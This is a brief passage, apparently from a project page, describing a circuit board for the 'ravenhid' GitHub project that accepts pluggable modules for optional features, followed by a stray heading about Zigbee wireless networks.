 Each of these options are supported in code, but can be ignored on the PCB. The PCB itself has been designed to use a pluggable module for each of these options, making it easy to ignore, install, or change out which ones you find useful. 
 https://github.com/emperorcow/ravenhid



 Zigbee Wireless Networks